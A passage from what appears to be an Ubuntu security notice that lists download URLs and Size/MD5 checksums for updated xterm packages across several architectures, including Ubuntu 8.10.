      Size/MD5:   841542 f7b04a66dc401dc22f5ddb7f345be229

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu1.1_amd64.deb
      Size/MD5:   469724 70acad02e39d60d79eb8fd80a55da27a

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu1.1_i386.deb
      Size/MD5:   453344 2a5d12cc01fa456f4bd205da497a1589

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_229-1ubuntu1.1_lpia.deb
      Size/MD5:   454232 8db8034c6e77acaa900675e948b28a52

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_229-1ubuntu1.1_powerpc.deb
      Size/MD5:   467854 9cde83be48898ed57edd5222300b82c7

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_229-1ubuntu1.1_sparc.deb
      Size/MD5:   463836 af8e50a43f685499861d80a269db29f0

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235-1ubuntu1.1.diff.gz
      Size/MD5:    64123 4ded8fda6ea425540c351325ea456ee7
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235-1ubuntu1.1.dsc
      Size/MD5:     1502 3119b97098961157134b965cd67e72df
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235.orig.tar.gz
      Size/MD5:   857714 5060cab9cef0ea09a24928f3c7fbde2b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235-1ubuntu1.1_amd64.deb
      Size/MD5:   486760 8fccb232d9da5308a6439eff39d01b23

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_235-1ubuntu1.1_i386.deb
      Size/MD5:   470726 39fbdb1ec355002760cfe3348b53eec9

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_235-1ubuntu1.1_lpia.deb
      Size/MD5:   471960 47e2adb407b0d99c6dc6fea4af228cf7

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_235-1ubuntu1.1_powerpc.deb
      Size/MD5:   484530 a6d968aa8aa52625d0b8cdb30fbc94ea

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_235-1ubuntu1.1_sparc.deb
      Size/MD5:   481590 9121f8d82c0e7a334d796c1dff96aa74




© 1998-2024 E-Soft Inc. All rights reserved.